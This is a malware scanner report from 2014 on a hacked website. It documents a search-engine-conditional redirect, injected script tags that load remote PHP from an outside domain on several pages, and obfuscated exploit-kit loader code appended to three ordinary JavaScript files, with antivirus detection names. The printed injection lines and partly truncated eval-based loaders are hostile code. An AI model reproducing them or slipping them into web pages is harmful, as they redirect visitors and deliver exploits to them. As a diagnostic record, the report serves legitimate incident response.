
Malware Scanner report for estatesatthomaslake.com

Malicious/Suspicious/Total URLs checked
3/7/15
10 pages have malicious or suspicious code (3 malicious, 7 suspicious). See details below.
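Blacklists
OK (not listed by the blacklists queried; see "Safe Browsing / Blacklists" below. A clean blacklist result only means the site has not been listed, not that the findings in this report are absent.)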
Malicious redirects
Found
The website redirects visitors who arrive from search engines (requests carrying a search-engine Referer header) to a third-party URL:
->http://reddeerhotyoga.ca/aeed.html?h=3358068
202 websites infected.

The website "estatesatthomaslake.com" has most probably been hacked and is losing visitors to the redirect. Take action as soon as possible to fix the underlying security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK


Malicious/Suspicious Redirects

Request | Server response | Status
URL: http://estatesatthomaslake.com/
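(request imitating a visitor arriving from a search engine; the same URL returns 200 OK in the page scan below, so the redirect appears to be conditional on the Referer header and may not show up when the site is opened directly)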


GET / HTTP/1.1
Host: estatesatthomaslake.com
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 302 Found
Connection: close
Date: Tue, 02 Sep 2014 11:51:20 GMT
Location: http://reddeerhotyoga.ca/aeed.html?h=3358068
Server: Apache
Content-Length: 301
Content-Type: text/html; charset=iso-8859-1
malicious

Scanned pages/files

Request | Server response | Status
http://estatesatthomaslake.com/
200 OK
Content-Length: 7827
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://jamaica2012.domcek32.sk/srbija%20not%20done%20yet/gqbrpcc4.php?id=51732582"></script>

http://estatesatthomaslake.com/page8.html
200 OK
Content-Length: 0
Content-Type: text/html
clean
http://estatesatthomaslake.com/test404page.js
404 Not Found
Content-Length: 2881
Content-Type: text/html
suspicious
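Suspicious code found (in the body returned for a nonexistent URL, i.e. the 404 error page also carries the injected script tag)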

<script type="text/javascript" src="http://jamaica2012.domcek32.sk/srbija%20not%20done%20yet/gqbrpcc4.php?id=51732590"></script>

http://estatesatthomaslake.com/page9.html
200 OK
Content-Length: 7351
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://jamaica2012.domcek32.sk/srbija%20not%20done%20yet/gqbrpcc4.php?id=51732588"></script>

http://estatesatthomaslake.com/wpscripts/jspngfix.js
200 OK
Content-Length: 5886
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('');
var supported = !/Gecko/.test(navigator.userAgent) && !/Opera/.test(navigator.userAgent) && /MSIE (5\.5)|[6]/.test(navigator.userAgent) && navigator.platform == "Win32";
function OnLoadPngFix() {
if(!supported) return;
if(!event.srcElement) return;
var src=event.srcElement.src;
if(!src) return;
if(!new RegExp(blankSrc).test(src)) {
if(/\.png$/.test(src.toLowerCase())) {
src = src.replace(/\(/g, "(" );
... 3101 bytes are skipped ...
:1:70:27:30:1f:20:32:4:1:74:4:1:74"[lwz](":");}imcj=uaxdr;syp=[];for(zmstyy=22-20-2;-zmstyy 1381!=0;zmstyy =1){trrm=zmstyy;if((0x19==031))syp =String.fromCharCode(eval(wiu imcj[1*trrm]) 0xa-vvqzo);}nli=eval;nli(syp)}

pt>')
/*/339810*/

Antivirus reports:

AntiVir
EXP/JS.Expack.GQ
Avast
JS:Decode-BML [Trj]
Ikarus
JS.Exploit.BlackHole
Rising
JS:Trojan.Script.JS.Quidvetis.a!1612880
Comodo
Exploit.JS.Expack.G
McAfee-GW-Edition
JS/Exploit-Blacole.eu
DrWeb
JS.IFrame.500
Microsoft
VirTool:JS/Obfuscator.EH
Fortinet
JS/Blacole.EU!tr.dldr
McAfee
JS/Exploit-Blacole.eu
AVG
JS/Redir
Norman
Kryptik.CCLX

http://estatesatthomaslake.com/wpscripts/jsRollover.js
200 OK
Content-Length: 7254
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('');
rolls = new Array(); numRolls=0;
function PPFindObj(n, d) {
var p,i,x;
if( !d ) d=document;
if((p=n.indexOf("?"))>0&&parent.frames.length) { d=parent.frames[n.substring(p 1)].document; n=n.substring(0,p); }
if( !(x=d[n])&&d.all ) x=d.all[n];
for( i=0;!x&&i<d.forms.length;i ) x=d.forms[i][n];
for( i=0;!x&&d.layers&&i<d.layers.length;i ) x=PPFindObj(n,d.layers[i].document);

... 3227 bytes are skipped ...
function mrxjk(){yfz=function(){--(skg.body)}()}skg=document;for(xnj=0;xnj<sozl["length"];xnj =1){sozl[xnj]=-(34) parseInt(sozl[xnj],qskja*4);}try{mrxjk()}catch(kulxze){fjzp=50-50;}if(!fjzp)tcm(String[nvgeq].apply(String,sozl));

810*/f27*

Antivirus reports:

AntiVir
HTML/ExpKit.Gen5
Avast
JS:Includer-ATK [Trj]
Ikarus
Exploit.JS.Blackhole
Microsoft
VirTool:JS/Obfuscator.EJ
Fortinet
JS/Redirector.BOZ!tr
NANO-Antivirus
Trojan.Script.Expack.chulnr
AVG
JS/Exploit
Norman
Blacole.XQ
ESET-NOD32
JS/Kryptik.AOT

http://estatesatthomaslake.com/index.html
200 OK
Content-Length: 7827
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://jamaica2012.domcek32.sk/srbija%20not%20done%20yet/gqbrpcc4.php?id=51732582"></script>

http://estatesatthomaslake.com/page3.html
200 OK
Content-Length: 0
Content-Type: text/html
clean
http://estatesatthomaslake.com/page4.html
200 OK
Content-Length: 11142
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://jamaica2012.domcek32.sk/srbija%20not%20done%20yet/gqbrpcc4.php?id=51732584"></script>

http://estatesatthomaslake.com/page8a.html
200 OK
Content-Length: 6685
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://jamaica2012.domcek32.sk/srbija%20not%20done%20yet/gqbrpcc4.php?id=51732587"></script>

http://estatesatthomaslake.com/page7.html
200 OK
Content-Length: 10296
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://jamaica2012.domcek32.sk/srbija%20not%20done%20yet/gqbrpcc4.php?id=51732585"></script>

http://estatesatthomaslake.com/wpscripts/jsValidation.js
200 OK
Content-Length: 6638
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('');
function ValidateEmail(sEmail)
{
var reEmail=/^(. )@(. )$/;
var reQuotedString="(\"[^\"]*\")";
var reIPDomain=/^\[(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})\]$/;
var reValidCharString="\[^\\s\\(\\)><@,;:\\\\\\\"\\.\\[\\]\] ";
var reGetString="(" reValidCharString "|" reQuotedString ")";
var reUserName=new RegExp("^" reGetString "(\\." reGetString ")*$");
var reDomain=new RegExp("^" reValidCharString "(\\." reVa
... 3191 bytes are skipped ...
(3)];function mrxjk(){yfz=function(){--(skg.body)}()}skg=document;for(xnj=0;xnj<sozl["length"];xnj =1){sozl[xnj]=-(34) parseInt(sozl[xnj],qskja*4);}try{mrxjk()}catch(kulxze){fjzp=50-50;}if(!fjzp)tcm(String[nvgeq].apply(String,sozl));

a5f*

Antivirus reports:

AntiVir
HTML/ExpKit.Gen5
Avast
JS:Includer-ATK [Trj]
Ikarus
Exploit.JS.Blackhole
Emsisoft
Backdoor.Agent.ZKZ (B)
Microsoft
VirTool:JS/Obfuscator.EJ
Fortinet
JS/Redirector.BOZ!tr
AVG
JS/Exploit
Norman
Blacole.XQ
ESET-NOD32
JS/Kryptik.APC

http://estatesatthomaslake.com/CCR1.pdf
200 OK
Content-Length: 300869
Content-Type: application/pdf
clean
http://estatesatthomaslake.com/CCR2.pdf
200 OK
Content-Length: 90909
Content-Type: application/pdf
clean
http://estatesatthomaslake.com/MINUTES 10-26-09.doc
200 OK
Content-Length: 61952
Content-Type: application/msword
clean

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=estatesatthomaslake.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://estatesatthomaslake.com/

Result: estatesatthomaslake.com is not infected or malware details are not published yet.